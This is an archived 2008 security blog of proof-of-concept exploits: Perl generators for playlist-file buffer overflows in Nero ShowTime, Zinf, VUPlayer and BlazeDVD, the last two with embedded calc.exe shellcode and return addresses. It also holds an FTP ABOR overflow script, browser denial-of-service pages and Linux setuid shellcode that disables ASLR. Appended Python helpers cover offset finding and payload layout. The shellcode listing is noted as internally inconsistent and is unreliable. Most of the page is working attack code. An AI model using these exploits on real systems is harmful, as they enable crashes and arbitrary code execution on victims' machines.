30 November, 2008
23 November, 2008
Nero ShowTime v5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC
#!/usr/bin/perl -w
#
# Nero ShowTime v5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC
#
# Summary: Nero ShowTime provides you with a high-performance software DVD player
# that takes you to a new dimension in DVDs. Its cinema-like sound and excellent image
# quality for all digital pictures make an adventure of every film! What is more, Nero ShowTime
# supports all DVD-Video formats and can play them from a disc and from the hard drive.
#
# Product web page: http://www.nero.com
#
# Description: Nero ShowTime is prone to a buffer-overflow vulnerability because it fails
# to perform adequate boundary checks on user-supplied input. Successfully exploiting
# this issue may allow remote attackers to execute arbitrary code in the context of the
# application. Failed exploit attempts will cause denial-of-service conditions. Nero ShowTime
# 5.0.15.0 is vulnerable; prior versions may also be affected.
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [ t00t ] gmail [ d0t ] com
#
# 24.11.2008
#
$filename = "Jackie_Chan.m3u";
$mana = "A" x 432809;
print "\n\n[*] Creating evul playlist: $filename ...\r\n";
sleep(3);
open(m3u, ">./$filename") || die "\n\aCannot open $filename: $!";
print m3u "$mana";
close (m3u);
print "\n[*] Playlist file successfully created!\r\n";
24 October, 2008
KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)
<!--
KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)
Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
KVIrc is being written by Szymon Stefanek and the KVIrc Development Team with
the contribution of many IRC-addicted developers around the world.
Product web page: http://www.kvirc.net/
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
24.10.2008
-->
<html>
<head>
<title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</title>
</head>
<body bgcolor="#FFFF00">
<center> <br /> <br /> <strong>Warning ! :)</strong> </center>
<script type="text/javascript">
alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");
function poc()
{
window.location.href = "irc://A:%n -i";
}
var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (answ == true)
{
poc();
}
else
{
window.location.href = "http://www.kvirc.net";
}
</script>
</body>
</html>
-------------------------------------------
PoC: http://zeroscience.org/codes/kvirc_fs.html
14 October, 2008
Eserv/3.x FTP Server (ABOR) Remote Stack Overflow PoC
#!/usr/bin/perl
#
# Eserv/3.x FTP Server (ABOR) Remote Stack Overflow PoC
#
# Summary: Eserv/3.x - Mail, News, Web and Proxy Servers - Mail
# Server (SMTP, IMAP4 and POP3) - News Server (NNTP) - Web Server
# (HTTP) - FTP Server - Proxy Servers (HTTP, FTP, Socks, etc) - Finger
# Server - Built-in scheduler and dialer.
#
# Product web page: http://www.eserv.ru/ | www.etype.net/eserv/
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail.com
#
# http://www.zeroscience.org
#
# 14.10.2008
#
use Net::FTP;
$ipaddr = "127.0.0.1";
$mana = "..?" x 13000;
$user = "admin";
$pass = "nimda";
$port = 21;
$ftp = Net::FTP->new($ipaddr, Port => $port, Debug => 0) || die "Cannot connect to $ipaddr on port $port: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;
# quot() sends the raw command line with its argument; Net::FTP's own abort() takes no argument
$ftp->quot("ABOR", $mana);
$ftp->quit;
print "\nDone!\n";
---------------------------------------------------
http://www.milw0rm.com/exploits/6752
http://www.packetstormsecurity.org/filedesc/eserv-overflow.txt.html
http://www.securityfocus.com/bid/31753/
03 October, 2008
VBA32 Personal Antivirus 3.12.8.x (malformed archive) Denial of Service PoC
Desc: VBA32 (VirusBlokAda) Personal Version 3.12.8.x suffers from a denial of service vulnerability: scanning a malformed archive causes memory corruption and crashes the software.
Product web page: http://www.anti-virus.by/en/personal.html
Tested on Microsoft Windows XP SP2 (English)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [m00t] com
http://www.zeroscience.org
03.10.2008
PoC: http://zeroscience.org/codes/vba32_poc.rar
http://www.milw0rm.com/exploits/6658
http://packetstormsecurity.org/filedesc/vba32-poc-tgz.html
http://www.sebug.net/exploit/4800/
http://www.securityfocus.com/bid/31560
http://heapoverflow.com/f0rums/public/9134-vba32-personal-antivirus-3-12-8-x-malformed-archive-dos-exploit.html
17 September, 2008
15 September, 2008
CoolCon v0.2 Released
Released my Cool Converter :P "CoolCon v0.2" written in C language, 862 lines of code with a nice interface and new features added.
Conversion from Text to: Binary, Decimal, Octal, Hexadecimal, ASCII, ROT13(vice versa)
Conversion from Decimal to: Binary, Octal, Hexadecimal
Conversion from Binary to: Decimal, Octal, Hexadecimal
Conversion from Text to URL Unicode UTF-8 (new).
Included: ASCII table and Base64 table output
I know i said that the new version will have base64 conversion and vigenere cipher but..no time so enjoy and till next release ;)
CoolCon v0.2 Download link: http://www.packetstormsecurity.org/Win/CoolCon0.2.rar
t00t :D
09 September, 2008
Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
<!--
Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
Summary: Maxthon Browser is a powerful tabbed browser built for
all users. Besides basic browsing functionality, Maxthon Browser
provides a rich set of features to improve your surfing experience.
Product web page: http://www.maxthon.com
by Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
09.09.2008
-->
<html>
<head>
<title>Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC</title>
</head>
<body>
<script type="text/javascript">
alert("Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC\n\n\t\tby LiquidWorm");
function thricer()
{
title="Attack";
url="http://www.thrice.net/";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}
else if( window.external )
{
window.external.AddFavorite( url, title);
}
else if(window.opera && window.print)
{
return (true);
}
}
var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (answ == true)
{
for (x=0; x<x+1; x++)
thricer();
}
else
{
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}
</script>
</body>
</html>
http://www.packetstormsecurity.org/filedesc/maxthon-dos.txt.html
http://www.milw0rm.com/exploits/6434
http://www.securityfocus.com/bid/31098
http://www.zeroscience.org/codes/maxthon_dos.txt
07 September, 2008
SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC
<!--
Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC
Summary: Web-browser, advanced e-mail and newsgroup client,
IRC chat client, and HTML editing made simple - all your
Internet needs in one application.
Product web page: http://www.seamonkey-project.org/
Desc: SeaMonkey suffers from a remote denial of service
vulnerability (DoS), using a special html file with the
<marquee> tag repeated multiple times (>24). Successfully exploiting
this issue allows remote attackers to cause the application
to freeze, denying service to legitimate users.
Tested on Microsoft Windows XP SP2 (English)
Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
08.09.2008
-->
<html>
<head>
<title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title>
</head>
<body>
<br /><br /><br /><br />
<br /><br /><br /><br />
<br /><br /><br /><br />
<center>
<script type="text/javascript">
document.write("<kbd>Wooow Camel..!! WOW!</kbd>");
function t00t()
{
for(i=0; i < 25; i++)
{
document.write("<marquee>");
}
}
alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit");
var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (b0x == true)
{
t00t();
}
else {
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}
</script>
</center>
</body>
</html>
http://www.packetstormsecurity.org/filedesc/seamonkey-dos.txt.html
http://www.securityfocus.com/bid/31070
Test: http://www.zeroscience.org/codes/seamonkey_dos.html
06 September, 2008
Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit
http://www.milw0rm.com/exploits/6391
http://www.packetstormsecurity.org/filedesc/flockweb-dos.txt.html
http://www.securityfocus.com/bid/31044/
Test: http://www.zeroscience.org/codes/flock_dos.html
PoC follows:
-------------------------------------------------
<!--
Flock Web Browser 1.2.5 Remote DoS Exploit
by Gjoko 'LiquidWorm' Krstic
http://www.zeroscience.org
liquidworm [t00t] gmail.com
06.09.2008
-->
<html>
<head>
<title>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</title>
</head>
<body>
<br /><br />
<center><h1><strong><kbd>Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit</kbd></strong></h1>
<br /><h2><kbd>Freezed/Locked - Not Responding...</kbd></h2></center>
<script type="text/javascript">
function Xploit()
{
title="DoS";
url="http://www.destr0y.net";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}
else if( window.external )
{
window.external.AddFavorite( url, title);
}
else if(window.opera && window.print)
{
return (true);
}
}
for (n=0; n<n+1; n++)
Xploit();
</script>
<center>
<a href="http://www.zeroscience.org/codes/flock_dos.html"><i>http://www.zeroscience.org/codes/flock_dos.html</i></a>
</center>
</body>
</html>
<!-- thanks to Gianni Amato -->
------------------------------------------
05 September, 2008
Google Chrome Browser 0.2.149.27 Denial of Service Exploit
Test: http://zeroscience.org/codes/goodos.html
http://packetstormsecurity.org/filedesc/google-chrome-dos2.txt.html
<!--
Vulnerability discovered by Rishi Narang
Exploit by LiquidWorm, September 2008
http://www.zeroscience.org
liquidworm [t00t] gmail.com
-->
<html>
<head>
<title>Google Chrome DoS Exploit</title>
</head>
<body>
<br />
<br />
<script type="text/javascript">
alert("Google Chrome Browser 0.2.149.27 Denial of Service Exploit");
var box = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
if (box == true)
{
document.write("Just point to the hyperlink... <a href=\"jox:%\"><strong>HERE</strong></a>");
}
else { alert("Ok Dude!"); window.location.href = "http://www.zeroscience.org"; }
</script>
</body>
</html>
25 August, 2008
Linux/x86 (Fedora 8) setuid(0) + setgid(0) + execve("echo 0 > /proc/sys/kernel/randomize_va_space") Shellcode
/*
 * Linux/x86 (Fedora 8) setuid(0) + setgid(0) + execve("echo 0 > /proc/sys/kernel/randomize_va_space")
 *
 * by LiquidWorm
 *
 * 2008 (c) www.zeroscience.org
 *
 * liquidworm [at] gmail.com
 *
 * 79 bytes.
 *
 * Note on the bytes as published: the 13 four-byte lines below carry only the string
 * bytes ("pace", "va_s", ...) with no 0x68 (push imm32) opcode in front of them, which is
 * the only way the 79-byte count adds up (19 + 13*4 + 8); the "push" comments describe the
 * intended encoding. Read as pushes, they leave "/bin//echo 0 > /proc//sys//kernel/randomize_va_space"
 * at ESP and hand that whole string to execve() as the path (argv = [path, NULL], envp = NULL),
 * so no shell ever interprets the '>' redirection.
 */
#include <stdio.h>
#include <string.h>
char sc[] =
"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx
"\xcd\x80" // int $0x80
"\x6a\x2e" // push $0x2e
"\x58" // pop %eax
"\x53" // push %ebx
"\xcd\x80" // int $0x80
"\x31\xd2" // xor %edx, %edx
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x70\x61\x63\x65" // push $0x65636170
"\x76\x61\x5f\x73" // push $0x735f6176
"\x69\x7a\x65\x5f" // push $0x5f657a69
"\x6e\x64\x6f\x6d" // push $0x6d6f646e
"\x6c\x2f\x72\x61" // push $0x61722f6c
"\x65\x72\x6e\x65" // push $0x656e7265
"\x73\x2f\x2f\x6b" // push $0x6b2f2f73
"\x2f\x2f\x73\x79" // push $0x79732f2f
"\x70\x72\x6f\x63" // push $0x636f7270
"\x20\x3e\x20\x2f" // push $0x2f203e20
"\x68\x6f\x20\x30" // push $0x30206f68
"\x2f\x2f\x65\x63" // push $0x63652f2f
"\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80"; // int $0x80
int main()
{
    /* sc[] sits in the writable data segment; with NX enforced the indirect call faults,
       so build with executable data (on 32-bit x86, gcc -m32 -z execstack also makes
       readable pages executable) */
    int (*fp)() = (int(*)())sc;
    printf("bytes: %u\n", (unsigned)strlen(sc));
    fp();
    return 0;
}
http://www.sebug.net/exploit/4455/
http://pooh.gr.jp/item-5674.html
http://www.milw0rm.com/shellcode/6268
http://packetstormsecurity.org/filedesc/linux-set.txt.html
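Added example, not part of the original post or its shellcode: a host-side check of the 79 bytes above, run in Python rather than executed. Counting the escapes gives a 19-byte setuid/setgid/execve prologue, 13 four-byte groups and an 8-byte tail, 79 in total as the header says, which only adds up if the 13 groups hold just the string bytes; the script therefore reads the groups as the `push` comments annotate them. It checks for NUL bytes (which would cut strlen() short in the C harness), pulls the three syscall numbers out of the `push imm8; pop eax` pairs, rebuilds the string the pushes leave at ESP, and shows what the final `int 0x80` hands to execve(): the whole command line as the path, argv = [path], envp = NULL. The offsets 19 and 13 are taken from the byte listing; nothing else is assumed.

```python
# Added example for this page, not the shellcode author's code: host-side
# checks on the 79 published bytes. Offsets (19-byte prologue, 13 dwords)
# are read off the byte listing above.
import struct

SC = (
    b"\x6a\x17\x58\x31\xdb\xcd\x80"         # push 23; pop eax; xor ebx,ebx; int 0x80  (setuid(0))
    b"\x6a\x2e\x58\x53\xcd\x80"             # push 46; pop eax; push ebx; int 0x80     (setgid(0))
    b"\x31\xd2\x6a\x0b\x58\x52"             # xor edx,edx; push 11; pop eax; push edx  (execve, NUL)
    b"\x70\x61\x63\x65\x76\x61\x5f\x73"     # 13 dwords the source annotates as "push $0x..."
    b"\x69\x7a\x65\x5f\x6e\x64\x6f\x6d"
    b"\x6c\x2f\x72\x61\x65\x72\x6e\x65"
    b"\x73\x2f\x2f\x6b\x2f\x2f\x73\x79"
    b"\x70\x72\x6f\x63\x20\x3e\x20\x2f"
    b"\x68\x6f\x20\x30\x2f\x2f\x65\x63"
    b"\x2f\x62\x69\x6e"
    b"\x89\xe3\x52\x53\x89\xe1\xcd\x80"     # mov ebx,esp; push edx; push ebx; mov ecx,esp; int 0x80
)

PROLOGUE_LEN = 19   # bytes before the first string dword
DWORD_COUNT = 13
SYS_SETUID, SYS_SETGID, SYS_EXECVE = 23, 46, 11   # i386 syscall numbers used above


def has_nul(sc: bytes) -> bool:
    """A 0x00 anywhere would end strlen()/strcpy() in the C harness early."""
    return b"\x00" in sc


def syscall_numbers(sc: bytes) -> list:
    """The immediates of the 'push imm8; pop eax' pairs (6a xx 58), in order."""
    return [sc[i + 1] for i in range(len(sc) - 2) if sc[i] == 0x6A and sc[i + 2] == 0x58]


def string_dwords(sc: bytes) -> list:
    """The 13 four-byte groups in the order the source pushes them."""
    body = sc[PROLOGUE_LEN:PROLOGUE_LEN + 4 * DWORD_COUNT]
    return [body[i:i + 4] for i in range(0, len(body), 4)]


def stack_string(sc: bytes) -> str:
    """What the pushes leave at ESP: the stack grows down, so the dword pushed
    last ("/bin") is the first four bytes of the string; the NUL dword pushed
    before all of them (push edx with edx=0) terminates it."""
    return b"".join(reversed(string_dwords(sc))).decode("ascii")


def execve_args(sc: bytes) -> dict:
    """Registers at the final int 0x80: ebx = esp (start of the string) is the
    path, ecx = [ebx, NULL] is argv, edx = 0 is envp."""
    path = stack_string(sc)
    return {"path": path, "argv": [path], "envp": None}


if __name__ == "__main__":
    print("length:", len(SC), "nul-free:", not has_nul(SC))
    print("syscalls:", syscall_numbers(SC))
    print("execve:", execve_args(SC))
```

The execve() line of the output is the point: the kernel is asked to run a file literally named `/bin//echo 0 > /proc//sys//kernel/randomize_va_space`, so to get the intended effect the string would have to be split into `/bin/sh`, `-c` and the command, with argv built from three pointers.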
VUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit
# Title: VUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit
#
# Summary: VUPlayer is a freeware multi-format audio player for Windows
#
# Product web page: http://www.vuplayer.com/vuplayer.php
#
# Desc: VUPlayer 2.49 suffers from a buffer overflow vulnerability that can be
# exploited remotely with user interaction (a crafted playlist). It fails to perform
# adequate boundary checking on the user-supplied input file (1016 bytes), allowing us
# to overwrite the EIP, ECX and EBP registers. Successful exploitation executes
# calc.exe; a failed attempt results in DoS.
#
#
# ---------------------------------WinDbg-------------------------------------
#
# (e7c.c40): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000001 ecx=41414141 edx=00da5c98 esi=0050b460 edi=0012ee24
# eip=41414141 esp=0012eab8 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
# 41414141 ?? ???
#
# ----------------------------------------------------------------------------
#
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Vulnerability discovered by Greg Linares & Expanders in version 2.44 (2006)
#
# Refs:
#
# - CVE: CVE-2006-6251
# - MILW0RM:2872
# - MILW0RM:2870
# - CERT-VN:VU#311192
# - BID:21363
# - FRSIRT:ADV-2006-4783
# - SECUNIA:23182
# - XF:vuplayer-plsm3u-bo(30629)
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail.com
#
# http://www.zeroscience.org
#
# 18.08.2008
#
print "\n\n";
print "=" x 80;
print "\n\n";
print "\tVUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit\n";
print "\t\t by LiquidWorm\n\n";
print "=" x 80;
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
$SHELLCODE = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff".
"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56".
"\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30".
"\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43".
"\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32".
"\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42".
"\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42".
"\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x34".
"\x4e\x43\x4b\x58\x4e\x57\x45\x30\x4a\x57".
"\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31".
"\x4b\x58\x4f\x45\x42\x52\x41\x30\x4b\x4e".
"\x49\x54\x4b\x48\x46\x53\x4b\x38\x41\x30".
"\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a".
"\x46\x38\x42\x4c\x46\x37\x47\x50\x41\x4c".
"\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x45\x46\x32\x46\x50".
"\x45\x57\x45\x4e\x4b\x38\x4f\x55\x46\x52".
"\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30".
"\x4b\x54\x4b\x58\x4f\x55\x4e\x51\x41\x50".
"\x4b\x4e\x4b\x38\x4e\x51\x4b\x38\x41\x30".
"\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30".
"\x43\x4c\x41\x33\x42\x4c\x46\x36\x4b\x38".
"\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37".
"\x4e\x50\x4b\x58\x42\x34\x4e\x30\x4b\x58".
"\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x4a\x36".
"\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x38".
"\x42\x4b\x42\x50\x42\x50\x42\x30\x4b\x38".
"\x4a\x36\x4e\x53\x4f\x55\x41\x53\x48\x4f".
"\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x38".
"\x42\x4c\x4b\x57\x42\x35\x4a\x36\x4f\x4e".
"\x50\x4c\x42\x4e\x42\x56\x4a\x56\x4a\x39".
"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f".
"\x47\x4e\x43\x36\x41\x56\x4e\x36\x43\x36".
"\x50\x32\x45\x36\x4a\x57\x45\x46\x42\x50".
"\x5a";
$FILE = "TETOVIRANJE.m3u";
$GARBAGE = "\x4A" x 461;
$NOPSLED = "\x90" x 200;
$RET = "\xC0\xE6\x12\x00";
print "\n\n[-] Buffering malicious playlist file. Please wait...\r\n";
sleep (5);
open (BOF, ">./$FILE") || die "\nCan't open $FILE: $!";
print BOF "$NOPSLED" . "$SHELLCODE" . "$GARBAGE" . "$RET";
close (BOF);
print "\n\n[+] File $FILE successfully created!\n\n";
system("pause");
[Screenshots in the original post: Stack, EIP, Shellcode]
http://www.packetstormsecurity.org/filedesc/vuplayer_bof.pl.txt.html
http://www.securityfocus.com/bid/21363
Zinf 2.2.1 PLF/M3U/GQMPEG Playlist File Remote Buffer Overflow Exploit
#!/usr/bin/perl
#
# Zinf 2.2.1 PLF/M3U/GQMPEG Playlist File Remote Buffer Overflow Exploit
#
# Summary: The Zinf audio player is a simple, but powerful audio player for Linux and
# Win32. It supports MP3, Ogg/Vorbis, WAV and Audio CD playback, SHOUTcast/Icecast HTTP
# streaming, RTP streaming, a powerful music browser, theme support and a download manager.
#
# Product web page: http://www.zinf.org/
#
# Desc: Zinf is reported prone to a remote buffer overflow vulnerability when processing
# malformed playlist files. This issue exists due to insufficient boundary checks performed
# by the application and may allow an attacker to gain unauthorized access to a vulnerable
# computer. Reportedly, this issue affects Zinf version 2.2.1 for Windows. Zinf version 2.2.5
# for Linux is reportedly fixed, however, this is not confirmed at the moment.
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Refs:
#
# - http://www.securityfocus.com/bid/11248
# - http://www.milw0rm.com/exploits/559
#
# Vulnerability discovered by Luigi Auriemma (24.11.2004)
#
# Coded by Gjoko "LiquidWorm" Krstic
#
# liquidworm [At] gmail.com
#
# http://www.zeroscience.org
#
# 14.08.2008
#
$buffer = "A" x 1300;
$ret = "BBBB";
open(pls, ">./zinf_list.pls") || die "\nCan't open zinf_list.pls: $!";
print pls $buffer.$ret;
close(pls);
print "\n--> PoC Playlist created...\n";
08 August, 2008
BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
#!/usr/bin/perl
#
# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
#
# Summary: BlazeDVD is leading powerful and easy-to-use DVD player software.
# It can provide superior video and audio (Dolby) quality, together with other
# enhanced features, e.g. recording DVD, playback of image and DV, bookmark and image
# capture, etc. Furthermore, besides DVD, Video CD and Audio CD, BlazeDVD supports DIVX,
# MPEG4, RM, QuickTime, WMV, WMV-HD, Macromedia Flash and any other video file
# you have the codec installed for. The DVD player software is widely
# compatible with hardware and runs stably and smoothly under Windows 98,
# 98SE, Me, 2000, XP, VISTA.
#
# Product web Page: http://www.blazevideo.com/dvd-player/index.htm
#
# Desc: BlazeDVD 5.0 suffers from a buffer overflow vulnerability that can be
# exploited via a crafted PLF playlist file locally and remotely. It fails to
# perform boundary checking on the user input file, allowing the EIP to be
# overwritten and thus controlling the next instruction of the software. After
# successful exploitation, calc.exe will be executed. Failed attempts will
# result in Denial Of Service (DoS).
#
# WinDbg (output):
#
# - (4d8.f80): Access violation - code c0000005 (first chance)
# - First chance exceptions are reported before any exception handling.
# - This exception may be expected and handled.
# - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c
# - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0 nv up ei pl nz ac pe nc
# - cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
# - 41414141 ?? ???
#
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by: Parvez Anwar and Greg Linares
#
# Refs:
#
# - http://secunia.com/advisories/23041/
# - http://www.frsirt.com/english/advisories/2006/4764
# - http://xforce.iss.net/xforce/xfdb/30567
# - http://osvdb.org/30770
# - http://www.securityfocus.com/bid/21337/
# - http://www.milw0rm.com/exploits/2880
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm@gmail.com
#
# http://www.zeroscience.org
#
# 08.08.2008
#
print "\n|==================================================================|\n";
print "|                                                                  |\n";
print "|  BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit   |\n";
print "|                          by LiquidWorm                           |\n";
print "|                                                                  |\n";
print "|==================================================================|\n\n";
$nop = "\x90" x 96;
# win32_exec EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = "\x29\xc9\x83\xe9\xdd\xd9\xee".
"\xd9\x74\x24\xf4\x5b\x81\x73".
"\x13\x7d\xe6\xe7\x4e\x83\xeb".
"\xfc\xe2\xf4\x81\x0e\xa3\x4e".
"\x7d\xe6\x6c\x0b\x41\x6d\x9b".
"\x4b\x05\xe7\x08\xc5\x32\xfe".
"\x6c\x11\x5d\xe7\x0c\x07\xf6".
"\xd2\x6c\x4f\x93\xd7\x27\xd7".
"\xd1\x62\x27\x3a\x7a\x27\x2d".
"\x43\x7c\x24\x0c\xba\x46\xb2".
"\xc3\x4a\x08\x03\x6c\x11\x59".
"\xe7\x0c\x28\xf6\xea\xac\xc5".
"\x22\xfa\xe6\xa5\xf6\xfa\x6c".
"\x4f\x96\x6f\xbb\x6a\x79\x25".
"\xd6\x8e\x19\x6d\xa7\x7e\xf8".
"\x26\x9f\x42\xf6\xa6\xeb\xc5".
"\x0d\xfa\x4a\xc5\x15\xee\x0c".
"\x47\xf6\x66\x57\x4e\x7d\xe6".
"\x6c\x26\x41\xb9\xd6\xb8\x1d".
"\xb0\x6e\xb6\xfe\x26\x9c\x1e".
"\x15\x16\x6d\x4a\x22\x8e\x7f".
"\xb0\xf7\xe8\xb0\xb1\x9a\x85".
"\x86\x22\x1e\xc8\x82\x36\x18".
"\xe6\xe7\x4e";
$ret = "\x78\x53\xbe\x01";
$payload = $nop.$shellcode.$ret;
open(plf, ">./The_Dark_Knight.plf");
print plf "$payload";
print "\n--> Playlist: The_Dark_Knight.plf successfully created...Enjoy!\n\n";
print "\n...t00t w00t!\n\a\n";
# August, 2008
-------------------------------------
http://www.milw0rm.com/exploits/6217
http://zeroscience.org/codes/blazedvd_bof.txt
http://www.securityfocus.com/bid/21337/exploit
http://www.xakep.ru/post/44818/BlazeDVD-Remote-Buffer-Overflow-Exploit.txt
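Added example, not code from this post or from the exploit authors: the VUPlayer exploit above fills the buffer with 200 NOPs, 351 bytes of shellcode and 461 filler bytes before the return address (1016 bytes in total), and the BlazeDVD one with 96 NOPs and 164 bytes of shellcode before its return address. The Python below, written for this page, shows the step that precedes a generator like those Perl scripts: it builds a Metasploit-style cyclic pattern, maps a crash EIP value back to an offset, assembles the sled/shellcode/filler/RET layout, and flags bytes a line-oriented M3U/PLF parser would treat as terminators. The 0xCC stand-in shellcode and the 2000-byte pattern are constructed for the example; the lengths and return addresses are the ones in the two exploits.

```python
# Added example for this page, not the exploit authors' code: offset finding and
# layout checks for the playlist-file overflows above. Sizes and return addresses
# come from the VUPlayer and BlazeDVD exploits; the 0xCC shellcode is a stand-in.
import itertools
import string
import struct


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...Ab0...). Every 4-byte window
    is unique within the first 20280 bytes, so a register value copied out of the
    crash dump maps back to exactly one offset."""
    out = bytearray()
    for upper, lower, digit in itertools.product(
            string.ascii_uppercase, string.ascii_lowercase, string.digits):
        out += (upper + lower + digit).encode("ascii")
        if len(out) >= length:
            break
    return bytes(out[:length])


def dword_at(data: bytes, offset: int) -> int:
    """The little-endian dword at offset, i.e. the value WinDbg would print in
    eip= if that slot were popped into EIP."""
    return struct.unpack("<I", data[offset:offset + 4])[0]


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Offset of the dword that landed in EIP (-1 if it is not from the pattern)."""
    return pattern.find(struct.pack("<I", eip))


def build_payload(sled: int, shellcode: bytes, pad: int, ret: int) -> bytes:
    """NOP sled + shellcode + filler + return address: the layout of the VUPlayer
    (200/351/461) and BlazeDVD (96/164/0) exploits, with RET as the last 4 bytes."""
    return b"\x90" * sled + shellcode + b"\x4a" * pad + struct.pack("<I", ret)


def ret_offset(payload: bytes) -> int:
    """Offset of the 4-byte return address; this must equal the distance from the
    start of the buffer to the saved EIP slot found with pattern_offset()."""
    return len(payload) - 4


def find_bad_chars(data: bytes, bad: bytes = b"\x00\x0a\x0d") -> list:
    """Offsets of bytes a line-oriented playlist parser is likely to treat as
    terminators: NUL ends a C string, CR/LF end a playlist entry. Any of them
    before the return address truncates the payload."""
    return [i for i, b in enumerate(data) if b in bad]


if __name__ == "__main__":
    pat = pattern_create(2000)                 # write this into the .m3u first
    crash_eip = dword_at(pat, 1012)            # stand-in for the eip= value from WinDbg
    print("eip=%08x is at pattern offset %d" % (crash_eip, pattern_offset(pat, crash_eip)))
    vu = build_payload(200, b"\xcc" * 351, 461, 0x0012E6C0)   # constructed shellcode
    blaze = build_payload(96, b"\xcc" * 164, 0, 0x01BE5378)
    for name, p in (("VUPlayer", vu), ("BlazeDVD", blaze)):
        print("%s: %d bytes, RET at %d, terminator bytes at %s"
              % (name, len(p), ret_offset(p), find_bad_chars(p)))
```

Write `pattern_create(N)` into the playlist, read the `eip=` value from WinDbg's first-chance exception line and feed it to `pattern_offset()`. For the VUPlayer layout the only terminator byte reported is offset 1015, the high 0x00 of the 0x0012E6C0 stack address; it is harmless only because it is the last byte of the file, which is also why the alphanumeric-encoded shellcode in that exploit contains none.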
